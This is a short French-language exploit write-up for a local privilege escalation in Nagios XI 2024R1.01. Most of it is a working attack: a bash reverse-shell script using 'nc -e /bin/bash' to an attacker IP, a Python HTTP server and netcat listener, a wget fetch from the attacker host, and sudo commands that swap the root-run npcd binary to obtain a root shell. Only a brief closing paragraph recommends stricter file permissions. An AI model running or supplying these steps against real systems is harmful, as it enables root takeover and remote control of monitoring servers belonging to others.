
Priv esc in Nagios 2024R1.01
CVE découverte par : Jarod Jaslow (MAWK)
En tant qu'utilisateur « NAGIOS », créer un fichier sur la machine attaquante avec le contenu suivant :
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Héberger le fichier sur la machine attaquante via un serveur HTTP Python :
python3 -m http.server 8000

Démarrer un serveur d'écoute Netcat (NC) sur la machine attaquante :
nc -nlvp 4445

Récupérer le fichier depuis la machine attaquante :
wget http://<Attacker IP>:8000/npcd

Exécuter les commandes suivantes pour élever les privilèges et recevoir une connexion en tant que root :
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


Il est recommandé de restreindre la capacité de l'utilisateur « NAGIOS » à écrire dans les exécutables des services Nagios qui sont exécutés en tant que root. Cela peut être réalisé en mettant en œuvre des permissions de fichiers et des contrôles d'accès plus stricts pour les répertoires et fichiers pertinents associés aux services Nagios.
Cela devrait être corrigé dans les nouvelles versions
CVE :